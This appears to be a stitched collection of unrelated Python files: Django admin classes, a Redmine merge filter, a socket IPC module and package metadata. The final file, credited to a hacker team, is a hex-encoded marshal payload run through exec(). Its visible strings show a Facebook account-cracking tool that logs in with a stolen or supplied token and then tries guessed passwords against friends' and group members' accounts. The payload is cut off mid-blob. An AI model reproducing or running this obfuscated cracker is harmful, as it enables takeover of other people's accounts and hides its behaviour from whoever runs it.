    list_display = ('content', 'answer', 'category',
                    'created_at', 'updated_at')
    list_filter = ('category', 'created_at')
    search_fields = ('content',)

    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        # Limit the "category" dropdown to categories created by the
        # requesting user; every other FK field falls straight through.
        if db_field.name == "category":
            user_categories = models.Category.objects.filter(user=request.user)
            kwargs["queryset"] = user_categories
        return super(QuestionAdmin, self).formfield_for_foreignkey(
            db_field, request, **kwargs)
class CategoryAdmin(admin.ModelAdmin):
    """Admin options for Category: only show categories owned by the
    requesting user."""

    def get_queryset(self, request):
        # Filter the base admin queryset rather than building a fresh one
        # from the manager, so ModelAdmin defaults (ordering, etc.) are
        # preserved. The original returned
        # models.Category.objects.filter(...) directly, bypassing super().
        qs = super(CategoryAdmin, self).get_queryset(request)
        return qs.filter(user=request.user)
# Expose both models in the Django admin with their customized admin classes.
admin.site.register(models.Category, CategoryAdmin)
admin.site.register(models.Question, QuestionAdmin)
|
from mergeit.extras.filters import RedmineFilter
class VersionRedmineFilter(RedmineFilter):
    """Filter that substitutes a Redmine task's fix-version name into the
    target branch pattern."""

    def run(self, source_match, source_branch, target_branch):
        # TODO: compare commit message task with branch name?
        task_id = source_match.groupdict()['task_id']
        task = self.get_task(task_id)
        version_name = task['fixed_version']['name']
        return target_branch.format(redmine_version=version_name)
# -*- coding: utf-8 -*-
# Copyright (C) 2014, Almar Klein
""" Simple IPC based on a persistent socket pair.
"""
import errno
import os
import socket
import sys
import threading
import time
# Python 2.x and 3.x compatibility: the native text type(s), as a tuple
# suitable for isinstance() checks (used for address validation below).
string_types = (str,) if sys.version_info[0] >= 3 else (basestring,)  # noqa: F821
## Constants
# Use a relatively small buffer size, to keep the channels better in sync
SOCKET_BUFFERS_SIZE = 10*1024
# Minimum timeout in seconds; because the timeout used by the other side
# is unknown, Connection applies at least this much (see Connection.__init__).
TIMEOUT_MIN = 0.5
# Status codes for a Connection (applied via Connection._set_status)
STATUS_CLOSED = 0     # no socket / socket torn down
STATUS_CLOSING = 1
STATUS_WAITING = 2    # bound and listening, waiting for a peer (bind())
STATUS_HOSTING = 3    # connected; this end hosted (set by HostThread)
STATUS_CONNECTED = 4  # connected; this end called connect()
## Functions and the class
def port_hash(name):
    """ port_hash(name)
    Deterministically map a string onto a port number between 49152 and
    65535 (2**14 = 16384 possibilities). This range is the range for
    dynamic and/or private (ephemeral) ports specified by iana.org.
    Equal names always produce equal port numbers.
    """
    factor = 0xd2d84a61
    acc = 0
    for char in name:
        acc += (acc >> 3) + ord(char) * factor
    acc += (acc >> 3) + len(name) * factor
    return 49152 + acc % 2**14
class Connection(object):
    """ Connection()
    One end of a persistent socket pair. Use bind() on one side and
    connect() on the other; both ends run the same handshake
    (see HandShaker).
    """

    def __init__(self):
        # Timeout value (if no data is received for this long,
        # the timedout signal is fired). Because we do not know the timeout
        # that the other side uses, we apply a minimum timeout.
        self._timeout = TIMEOUT_MIN
        self._set_status(STATUS_CLOSED)

    def _get_hostname_and_port(self, address):
        """ Parse and validate a 'host:port' address string.
        Returns (hostname, port) where port is an int; a non-numeric
        port is hashed onto the ephemeral range via port_hash().
        Raises ValueError for malformed addresses.
        """
        # Check
        if not isinstance(address, string_types):
            raise ValueError("Address should be a string.")
        if ":" not in address:
            raise ValueError("Address should be in format 'host:port'.")
        host, port = address.split(':')
        # Process host
        if host.lower() == 'localhost':
            host = '127.0.0.1'
        if host.lower() == 'publichost':
            host = 'publichost' + '0'
        if host.lower().startswith('publichost') and host[10:].isnumeric():
            index = int(host[10:])
            hostname = socket.gethostname()
            tmp = socket.gethostbyname_ex(hostname)
            try:
                host = tmp[2][index]  # This resolves to 127.0.1.1 on some Linuxes
            except IndexError:
                raise ValueError('Invalid index (%i) in public host addresses.' % index)
        # Process port
        try:
            port = int(port)
        except ValueError:
            port = port_hash(port)
        # Valid ports are 0..65535. The original tested `port > 2**16`,
        # which wrongly accepted 65536 despite the error message below.
        if port >= 2**16:
            raise ValueError("The port must be in the range [0, 2^16>.")
        return host, port

    def _set_status(self, status, bsd_socket=None):
        """ _set_status(status, bsd_socket=None)
        Private method to apply the bsd_socket and update the status.
        Called whenever the connection state changes.
        """
        # Update hostname and port number; for hosting connections the port
        # may be different if max_tries > 0. Each client connection will be
        # assigned a different ephemeral port number.
        # http://www.tcpipguide.com/free/t_TCPPortsConnectionsandConnectionIdentification-2.htm
        # Also get hostname and port for other end
        if bsd_socket is not None:
            self._hostname1, self._port1 = bsd_socket.getsockname()
            if status != STATUS_WAITING:
                self._hostname2, self._port2 = bsd_socket.getpeername()
        assert status in (STATUS_CLOSED, STATUS_CLOSING, STATUS_WAITING,
                          STATUS_HOSTING, STATUS_CONNECTED)
        self._status = status
        if status in (STATUS_HOSTING, STATUS_CONNECTED):
            # Really connected: store socket and make it non-blocking.
            self._bsd_socket = bsd_socket
            bsd_socket.setblocking(False)
        if status == STATUS_CLOSED:
            # Close bsd socket. Note: shutdown() requires a "how" argument;
            # the original called it with none, which always raised and
            # silently skipped the shutdown.
            try:
                self._bsd_socket.shutdown(socket.SHUT_RDWR)
            except Exception:
                pass
            try:
                self._bsd_socket.close()
            except Exception:
                pass
            self._bsd_socket = None

    @property
    def is_waiting(self):
        """ Get whether this connection instance is waiting for a connection.
        This is the state after using bind() and before another context
        connects to it.
        """
        return self._status == STATUS_WAITING

    def bind(self, address, max_tries=1):
        """ bind(address, max_tries=1)
        Bind the bsd socket. Launches a dedicated thread that waits
        for incoming connections and does the handshaking procedure.
        If max_tries > 1, successive port numbers are tried until one
        is free.
        """
        hostname, port = self._get_hostname_and_port(address)
        # Create socket.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Set buffer size to be fairly small (less than 10 packages)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SOCKET_BUFFERS_SIZE)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, SOCKET_BUFFERS_SIZE)
        # Apply SO_REUSEADDR when binding, so that an improperly closed
        # socket on the same port will not prevent us from connecting.
        # It also allows a connection to bind at the same port number,
        # but only after the previous binding connection has connected
        # (and has closed the listen-socket).
        #
        # SO_REUSEADDR means something different on win32 than it does
        # for Linux sockets; on Windows the default behavior is already
        # what we want. Also see:
        # * http://msdn.microsoft.com/en-us/library/ms740621%28VS.85%29.aspx
        # * http://twistedmatrix.com/trac/ticket/1151
        if not sys.platform.startswith('win'):
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Try all ports in the specified range
        for port2 in range(port, port + max_tries):
            try:
                s.bind((hostname, port2))
                break
            except Exception:
                # Raise the socket exception if we were asked to try
                # just one port. Otherwise just try the next.
                if max_tries == 1:
                    raise
                continue
        else:
            # We tried all ports without success
            raise IOError("Could not bind to any of the %s ports tried." % max_tries)
        # Tell the socket it is a host, backlog of zero
        s.listen(0)
        # Enter the waiting state; the host thread promotes the status to
        # STATUS_HOSTING once a peer connects and the handshake succeeds.
        self._set_status(STATUS_WAITING, s)
        # Start thread to wait for a connection
        # (keep reference so the thread-object stays alive)
        self._hostThread = HostThread(self, s)
        self._hostThread.start()

    def connect(self, address, timeout=1.0):
        """ connect(address, timeout=1.0)
        Connect to a bound socket, retrying until `timeout` seconds pass.
        Raises IOError if no connection or handshake could be made.
        """
        hostname, port = self._get_hostname_and_port(address)
        # Create socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Set buffer size to be fairly small (less than 10 packages)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SOCKET_BUFFERS_SIZE)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, SOCKET_BUFFERS_SIZE)
        # Refuse ridiculously low timeouts
        if timeout <= 0.01:
            timeout = 0.01
        # Try to connect, remembering the last failure. The original read
        # sys.exc_info() after the loop, but Python 3 clears the exception
        # as soon as the except block exits, losing the error text.
        ok = False
        err = ''
        deadline = time.time() + timeout
        while not ok and time.time() < deadline:
            try:
                s.connect((hostname, port))
                ok = True
            except (socket.error, socket.timeout) as why:
                err = str(why)
                time.sleep(timeout / 100.0)
        # Did it work?
        if not ok:
            raise IOError("Cannot connect to %s on %i: %s" % (hostname, port, err))
        # Shake hands
        h = HandShaker(s)
        success, info = h.shake_hands_as_client()
        # Problem?
        if not success:
            self._set_status(STATUS_CLOSED)
            if not info:
                info = 'problem during handshake'
            raise IOError('Could not connect: ' + info)
        # Store id of the peer
        self._id2, self._pid2 = info
        # Connected as client
        self._set_status(STATUS_CONNECTED, s)
class HostThread(threading.Thread):
    """ HostThread(context_connection, bsd_socket)
    The host thread is used by the connection when hosting. This thread
    waits for another context to connect to it, and then performs the
    handshaking procedure. When a successful connection is made, the
    connection's status is updated and this thread exits.
    """

    def __init__(self, context_connection, bsd_socket):
        threading.Thread.__init__(self)
        # Store connection and socket
        self._context_connection = context_connection
        self._bsd_host_socket = bsd_socket
        # Make daemon (Python can exit even if this thread is still alive).
        # Note: setDaemon() is deprecated; assign the attribute instead.
        self.daemon = True

    def run(self):
        """ Run the main loop. Waits for a connection and performs
        handshaking if successful.
        """
        # Try making a connection until success or the context is stopped
        while self._context_connection.is_waiting:
            # Wait for connection
            s = self._wait_for_connection()
            if not s:
                continue
            # Check if not closed in the mean time
            if not self._context_connection.is_waiting:
                break
            # Do handshaking
            hs = HandShaker(s)
            success, info = hs.shake_hands_as_host()
            if not success:
                print('Yoton: Handshake failed: ' + info)
                continue
            # Success! Store id/pid of the peer.
            self._context_connection._id2 = info[0]
            self._context_connection._pid2 = info[1]
            # Close hosting socket, thereby enabling rebinding at the same port
            self._bsd_host_socket.close()
            # Update the status of the connection
            self._context_connection._set_status(STATUS_HOSTING, s)
            # Break out of the loop
            break
        # Drop references so connection/socket can be collected
        del self._context_connection
        del self._bsd_host_socket

    def _wait_for_connection(self):
        """ The thread will wait here until someone connects. When a
        connection is made, the new socket is returned; when the
        connection stops waiting, None is returned.
        """
        # Set timeout so that we can check the waiting state from time to time
        self._bsd_host_socket.settimeout(0.25)
        # Wait
        while self._context_connection.is_waiting:
            try:
                s, addr = self._bsd_host_socket.accept()
                return s  # Return the new socket
            except socket.timeout:
                pass
            except socket.error as why:
                # Skip errors caused by interruptions. The original compared
                # against a bare EINTR name that was never imported, which
                # raised NameError whenever this path fired.
                if why.errno != errno.EINTR:
                    raise
class HandShaker:
    """ HandShaker(bsd_socket)
    Class that performs the handshaking procedure for Tcp connections.
    Essentially, the connecting side starts by sending the greeting
    message; the hosting side responds with the same message.
    This process is very similar to a client/server pattern (both
    messages are also terminated with '\r\n'). This is done such that
    if for example a web client tries to connect, a sensible error
    message can be returned. Or when a connection tries to connect
    to a web server, it will be able to determine the error gracefully.
    """

    # Greeting exchanged by both sides (resolves the in-code TODO to
    # define the message as a constant).
    MESSAGE = 'ZOOF says yoton!'

    # Failure descriptions returned as ``info``. The original referenced
    # STOP_HANDSHAKE_TIMEOUT / STOP_HANDSHAKE_FAILED, which are not defined
    # anywhere in this module and raised NameError on any failed handshake.
    STOP_HANDSHAKE_TIMEOUT = 'Handshake timed out.'
    STOP_HANDSHAKE_FAILED = 'Handshake failed.'

    def __init__(self, bsd_socket):
        # Store bsd socket
        self._bsd_socket = bsd_socket

    def shake_hands_as_host(self):
        """ shake_hands_as_host()
        As the host, we wait for the client to ask stuff, so when
        for example a http client connects, we can stop the connection.
        Returns (success, info), where info is the id of the context at
        the other end, or the error message in case success is False.
        """
        message = self.MESSAGE
        # Get request
        request = self._recv_during_handshaking()
        if not request:
            return False, self.STOP_HANDSHAKE_TIMEOUT
        elif request.strip() == message:
            self._send_during_handshaking(message)
            return True, (0, 0)
        else:
            # Client is not yoton
            self._send_during_handshaking('ERROR: this is Zoof via yoton.')
            return False, self.STOP_HANDSHAKE_FAILED

    def shake_hands_as_client(self):
        """ shake_hands_as_client()
        As the client, we ask the host whether it is a Yoton context
        and whether the channels we want to support are all right.
        Returns (success, info), where info is the id of the context at
        the other end, or the error message in case success is False.
        """
        message = self.MESSAGE
        # Do request
        self._send_during_handshaking(message)
        # Get response
        response = self._recv_during_handshaking()
        # Process
        if not response:
            return False, self.STOP_HANDSHAKE_TIMEOUT
        elif response.strip() == message:
            return True, (0, 0)
        else:
            return False, self.STOP_HANDSHAKE_FAILED

    def _send_during_handshaking(self, text, shutdown=False):
        """ Send text + CRLF; returns -1 when the socket failed, else None.
        When shutdown is True, also shut down the writing end.
        """
        bb = (text + '\r\n').encode('utf-8')
        try:
            # sendall() returns None; the original bound its "result".
            self._bsd_socket.sendall(bb)
        except socket.error:
            return -1  # Socket closed down badly
        if shutdown:
            try:
                self._bsd_socket.shutdown(socket.SHUT_WR)
            except socket.error:
                pass

    def _recv_during_handshaking(self, timeout=2):
        """ Receive bytes until CRLF or EOF. Returns the decoded text, or
        None when the socket fails or `timeout` seconds pass. The original
        computed the deadline but never checked it, so a silent peer
        could block this call forever.
        """
        # Bound each recv() so a silent peer cannot hang us; the socket is
        # made non-blocking by the connection after handshaking anyway.
        self._bsd_socket.settimeout(timeout)
        # Init parts (start with one byte, such that len(parts) is always >= 2)
        parts = [' '.encode('ascii')]
        end_bytes = '\r\n'.encode('ascii')
        maxtime = time.time() + timeout
        # Receive data
        while True:
            if time.time() > maxtime:
                return None  # Timed out
            try:
                part = self._bsd_socket.recv(1)
                parts.append(part)
            except socket.timeout:
                return None  # Timed out
            except socket.error:
                return None  # Socket closed down badly
            # Detect end by shutdown (EOF)
            if not part:
                break
            # Detect end by \r\n
            if (parts[-2] + parts[-1]).endswith(end_bytes):
                break
        # Combine parts (discard the first (dummy) part)
        bb = bytes().join(parts[1:])
        return bb.decode('utf-8', 'ignore')
|
# <p>
# Package metadata for pnbp ("pretty notebook parser"); the html-comment
# style <p>/<script> markers appear to be decorative only.
__title__ = 'pnbp'
__description__ = 'pretty notebook parser'
__url__ = 'https://github.com/prettynb/pnbp'
__version__ = '0.8.6'
__build__ = 0x111000
__author__ = 'Ellenurb Sitruc'
__author_email__ = 'ellenurbsitruc@gmail.com'
__license__ = 'MIT License'
__copyright__ = 'Copyright (c) 2021 prettynb'
# <script>
__cake__ = None #\\ nb <- https://github.com/psf/requests/blob/master/requests/__version__.py
# </script>
# </p>
|
######################################
# Thank You Allah Swt.. #
# Thanks My Team : Hacker Cyber Team Tegal #
# Thnks You All My Friends me. #
# Thanks All Member BCC : #
# Leader : Hamdhan channel97 #
# CO Founder : Mr.Hamdan #
# CO Leader : Tegal #
# CO : hamdan sobirin #
# Zumbailee,Febry, Bima, Accil, Alfa #
# Ardi Bordir Raka, Wahyu Andika. #
# Mr.OO3T, Yulia Febriana, Sadboy, #
# Cyto Xploit, Sazxt, Minewizard, #
# Riki, Omest #
######################################
import marshal, base64
exec(marshal.loads(base64.b16decode("630000000000000000040000004000000073170200006400006401006C00005A00006400006401006C01005A01006400006401006C02005A02006400006401006C03005A03006400006401006C04005A04006400006401006C05005A05006400006401006C06005A06006400006401006C07005A07006400006401006C08005A08006400006401006C09005A09006400006401006C0A005A0A006400006401006C0B005A0B006400006401006C0C005A0C006400006402006C0D006D0E005A0E00016400006403006C0F006D10005A1000016400006404006C0C006D11005A110001651200650100830100016501006A130064050083010001650C006A11008300005A14006514006A1500651600830100016514006A1700650C006A18006A1900830000640600640700830101016418006701006514005F1A00640A008400005A1B00640B008400005A1C00640C008400005A1D006500006A1E00640D0083010001640E008400005A1F00640F005A20006700005A21006700005A22006700005A23006700005A24006700005A25006700005A26006700005A27006700005A28006700005A29006700005A2A006700005A2B006700005A2C006700005A2D006700005A2E006700005A2F006700005A30006700005A31006410005A32006411005A33006412008400005A34006413008400005A35006414008400005A36006415008400005A37006538006416008401005A3900653A006417006B0200721302653400830000016E000064010053281900000069FFFFFFFF4E2801000000740A000000546872656164506F6F6C2801000000740F000000436F6E6E656374696F6E4572726F722801000000740700000042726F7773657274040000007574663874080000006D61785F74696D656901000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E31366300000000000000000100000043000000731600000064010047487400006A01006A0200830000016400005328020000004E73160000000A1B5B33393B316D205468616E6B20596F75202A5F2A280300000074020000006F7374030000007379737404000000657869742800000000280000000028000000007302000000646774060000006B656C7561720E0000007304000000000105016300000000000000000200000043000000733200000064010047487400006A0100640200830100016403004748640400474864010047487400006A02006A03008300000164000
05328050000004E7401000000207405000000636C656172734A0000000A1B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B33313B316D4B6F6E656B7369205465727075747573201B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D73650000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D53696C61686B616E20506572696B7361204B656D62616C69204B6F6E656B736920496E7465726E657420416E64611B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D28040000005205000000740600000073797374656D520600000052070000002800000000280000000028000000007302000000646774030000006F747712000000730C000000000105010D0105010501050163010000000200000003000000430000007343000000783C007C000064010017445D30007D01007400006A01006A02007C0100830100017400006A01006A0300830000017404006A050064020083010001710B00576400005328030000004E73010000000A677B14AE47E17A843F2806000000520600000074060000007374646F7574740500000077726974657405000000666C757368740400000074696D657405000000736C656570280200000074010000007A740100000065280000000028000000007302000000646774050000006A616C616E1A00000073080000000001110110010D01730C0000007368206E61726765742E73686300000000020000000600000043000000734F0000006401006402006403006404006405006406006706007D00007830007C0000445D28007D01006407007C010017477400006A01006A0200830000017403006A040064080083010001711F00576400005328090000004E73040000002E20202073040000002E2E202073040000002E2E2E2073050000002E2E2E2E2073050000002E2E2E2E2E73060000002E2E2E2E2E2E73330000000D1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D536564616E67204C6F67696E1B5B33393B316D690100000028050000005206000000520D000000520F0000005210000000521100000028020000007405000000746974696B74010000006F2800000000280000000073020000006467740300000074696B23000000730A000000000218010D0108010D016900000000730D0000001B5B33316D4E6F742056756C6E73090000001B5B33326D56756C6E63000000000B000000060000004300000073170300007400006A010064010083010001791A007402006402006403008302007D000074030083000001576EE902047404007405006602006B0A007212030101017400006A0100640100830100017400006A0100640
400830100017400006A01006405008301000164060047487406006407008301007D0100640800474864060047487406006409008301007D020064080047486406004748740700830000017911007408006A0200640A0083010001576E2D00047409006A0A006B0A0072DC00010101640B004748740B006A0C00640C0083010001740D00830000016E010058740E007408006A0F005F10007408006A1100640D00640E00830001017C01007408006A1200640F003C7C02007408006A12006410003C7408006A1300830000017408006A14008300007D03006411007C03006B0600729602793D016412007C010017641300177C020017641400177D0400690B0064150064160036641700641800367C0100640F0036641900641A0036641B00641C0036641B00641D0036641E00641F0036642000642100367C02006417003664220064230036642400642500367D05007415006A16006426008301007D06007C06006A17007C0400830100017C06006A18008300007D07007C05006A17006901007C070064270036830100016428007D03007419006A1A007C03006429007C05008301017D0800741B006A1C007C08006A1D008301007D0900740200640200642A008302007D0A007C0A006A1E007C0900642B0019830100017C0A006A1F0083000001640B004748642C004748642D00474864080047487419006A2000642E007C0900642B00191783010001740B006A0C00642F00830100017403008300000157719602047419006A21006A22006B0A00729202010101740D0083000001719602586E00006430007C03006B060072DA02640B0047486431004748643200474864310047487400006A010064330083010001740B006A0C00640C008301000174230083000001711303640B004748642C004748643400474864080047487400006A010064330083010001740B006A0C0064350083010001742400830000016E0100586400005328360000004E520A00000073090000006C6F67696E2E747874740100000072730C0000007368206E61726765742E736873070000007368206F2E736873370000000000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959773480000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B33356D476D61696C1B5B33313B316D2F1B5B33353B316D4E6F6D6F721B5B313B39316D3A1B5B313B33396D2073370000000000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D733A0000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B3
3356D50617373776F72642046421B5B313B39316D3A1B5B313B33396D20731600000068747470733A2F2F6D2E66616365626F6F6B2E636F6D73380000000A0000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D690100000074020000006E7269000000007405000000656D61696C740400000070617373730B000000736176652D64657669636573470000006170695F6B65793D383832613834393033363164613938373032626639376130323164646331346463726564656E7469616C735F747970653D70617373776F7264656D61696C3D7360000000666F726D61743D4A534F4E67656E65726174655F6D616368696E655F69643D3167656E65726174655F73657373696F6E5F636F6F6B6965733D316C6F63616C653D656E5F55536D6574686F643D617574682E6C6F67696E70617373776F72643D733B00000072657475726E5F73736C5F7265736F75726365733D30763D312E3036326638636539663734623132663834633132336363323334333761346133327420000000383832613834393033363164613938373032626639376130323164646331346474070000006170695F6B6579740800000070617373776F7264741000000063726564656E7469616C735F7479706574040000004A534F4E7406000000666F726D6174740100000031741300000067656E65726174655F6D616368696E655F6964741800000067656E65726174655F73657373696F6E5F636F6F6B6965737405000000656E5F555374060000006C6F63616C65730A000000617574682E6C6F67696E74060000006D6574686F64740100000030741400000072657475726E5F73736C5F7265736F75726365737303000000312E3074010000007674030000006D64357403000000736967732700000068747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E7068707406000000706172616D73740100000077740C0000006163636573735F746F6B656E73380000000A0000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29597732E0000001B5B313B33396D5B1B5B313B33326DE29C931B5B313B33396D5D201B5B313B39326D4C6F67696E20537563657373734D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6D6574686F643D706F737426756964733D6777696D75736133266163636573735F746F6B656E3D6902000000740A000000636865636B706F696E74520900000073470000000A1B5B33393B316D5B1B5B33313B316D211
B5B33393B316D5D1B5B33333B316D536570657274696E796120416B756E20466220416E6461204B656E6120436865636B706F696E747310000000726D202D7266206C6F67696E2E747874732C0000001B5B33393B316D5B1B5B33313B316D211B5B33393B316D5D1B5B33333B316D4C6F67696E20476167616C2121690300000028250000005205000000520B00000074040000006F70656E7405000000737570657274080000004B65794572726F727407000000494F4572726F7274090000007261775F696E70757452170000007402000000627274090000006D656368616E697A65740800000055524C4572726F7252100000005211000000520C00000074040000005472756574080000005F666163746F7279740700000069735F68746D6C740B00000073656C6563745F666F726D7404000000666F726D74060000007375626D6974740600000067657475726C7407000000686173686C696274030000006E65777406000000757064617465740900000068657864696765737474080000007265717565737473740300000067657474040000006A736F6E74050000006C6F616473740400000074657874520E0000007405000000636C6F73657404000000706F7374740A000000657863657074696F6E735201000000520800000074050000006C6F67696E280B0000007405000000746F6B6574740200000069647403000000707764740300000075726C522C0000007404000000646174617401000000787401000000615218000000521200000074040000007A6564642800000000280000000073020000006467524C00000042000000738400000000010D0103010F010B0113010D010D010D0105010C01050105010C0105010501070103011101100105010D010B010C0110010D010D010A010C010C010301160153010F010D010C0114010601150112010F0111010A01050105010501050115020D010B0113010E020C0105010501050105010D010D010A0205010501050105010D010D01630000000000000000050000004300000073920000007400006A0100640100830100017919007402006402006403008302006A0300830000610400576E3700047405006B0A00725F0001010164040047487400006A0100640500830100017406006A070064060083010001740800830000016E0100587400006A0100640100830100017400006A0100640700830100017400006A010064080083010001740900830000016400005328090000004E520A00000073090000006C6F67696E2E747874521800000073200000001B5B313B39316D5B215D20546F6B656E20746964616B20646974656D756B616E7310000000726D202D7266206C6F67696E2E7478746901000000730C000
0007368206E61726765742E73687307000000736820782E7368280A0000005205000000520B0000005231000000740400000072656164524D000000523400000052100000005211000000524C000000740B00000070696C69685F73757065722800000000280000000028000000007302000000646752320000008B000000731800000000020D01030119010D0105010D010D010B020D010D010D0163000000000C000000050000004300000073A7020000640100474864010047487400006402008301007D00007C00006403006B02007231006404004748740100830000016EAE017C00006405006B020072AF007402006A0300640600830100017402006A030064070083010001740400640800830100017405006A0600640900740700178301007D01007408006A09007C01006A0A008301007D02007856017C0200640A0019445D17007D0300740B006A0C007C0300640B001983010001719100576E30017C0000640C006B020072A8017402006A0300640600830100017402006A030064070083010001640D00640E00144748740000640F008301007D0400793E007405006A06006410007C04001764110017740700178301007D01007408006A09007C01006A0A008301007D05006412007C050064130019174748576E270004740D006B0A00725101010101641400474874000064150083010001740E00830000016E0100587405006A06006416007C04001764170017740700178301007D06007408006A09007C06006A0A008301007D0300785D007C0300640A0019445D17007D0700740B006A0C007C0700640B001983010001718A01576E37007C00006418006B020072CB017402006A030064190083010001740F00830000016E1400641A007C000017641B00174748740100830000017402006A0300640600830100017402006A0300641C0083010001641D00741000741100740B00830100830100174748740400641E0083010001641F006420006421006703007D08007830007C0800445D28007D09006422007C090017477412006A13006A1400830000017415006A160064230083010001712E0257487402006A0300642400830100016425008400007D0A007417006426008301007D0B007C0B006A18007C0A00740B0083020001642700474874000064280083010001740E00830000016400005328290000004E520900000073380000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D50696C696E204E6F201B5B33313B316D3A1B5B33393B316D20740000000073180000001B5B313B39316D5B215D204A616E67616E206B6F736F6E6774020000003031520A000000730C0000007368206E61726765742E7368733D0000001B5B313
B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D656E67616D62696C2069642074656D616E201B5B313B39376D2E2E2E733300000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6163636573735F746F6B656E3D5251000000524E000000740C0000003230303030303030303030306928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B2B5D201B5B313B39326D494420477275702020201B5B313B39316D3A1B5B313B39376D20732500000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F67726F75702F3F69643D730E000000266163636573735F746F6B656E3D733C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4E616D612067727570201B5B313B39316D3A1B5B313B39376D2074040000006E616D65731F0000001B5B313B39316D5B215D204772757020746964616B20646974656D756B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F73350000002F6D656D626572733F6669656C64733D6E616D652C6964266C696D69743D393939393939393939266163636573735F746F6B656E3D740200000030307310000000726D202D7266206C6F67696E2E74787473200000001B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B313B39376D7318000000201B5B313B39316D50696C69682059616E672042656E61727307000000736820762E7368733A0000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4A756D6C6168204944201B5B313B39316D3A201B5B313B39356D73320000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4C6F6164696E67201B5B313B39376D2E2E2E73040000002E20202073040000002E2E202073040000002E2E2E2073410000000D0D1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D756C6169204D656E67616B736573204B656D616E616E201B5B313B39376D69010000007307000000736820622E736863010000000C000000030000005300000073CB0200007C00007D010079B7027400006A01006401007C01001764020017740200178301007D02007403006A04007C02006A05008301007D03007C030064030019640400177D04007406006A07006405007C010017640600177C040017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296006409007C010
017640A00177C040017640B001747486E2602640C007C0600640D00196B060072B600640E007C010017640B001747486E06027C030064030019640F00177D07007406006A07006405007C010017640600177C070017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007216016409007C010017640A00177C070017640B001747486EA601640C007C0600640D00196B0600723601640E007C010017640B001747486E86017C030064100019640400177D08007406006A07006405007C010017640600177C080017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296016409007C010017640A00177C080017640B001747486E2601640C007C0600640D00196B060072B601640E007C010017640B001747486E06017C0300641100197D09007C09006A09006412006413008302007D0A007406006A07006405007C010017640600177C0A0017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007224026409007C010017640A00177C0A0017640B001747486E9800640C007C0600640D00196B0600724402640E007C010017640B001747486E78007C0300641400197D0B007406006A07006405007C010017640600177C0B0017640700178301007D05007403006A08007C05008301007D06006408007C06006B060072A0026409007C010017640A00177C0B0017640B001747486E1C00640C007C0600640D00196B060072BC02640E007C01001747486E0000576E07000101016E0100586400005328150000004E731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F730F0000002F3F6163636573735F746F6B656E3D740A00000066697273745F6E616D657403000000313233739100000068747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D7317000000266C6F63616C653D656E5F55532670617373776F72643D73480000002673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D3366353535663939666236316663643761613063343466353866353232656636522F00000073310000001B5B313B33396D5B20201B5B33323B316D537563657373201B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7313000000201B5B33313B316D5D205B1B5B33393B3
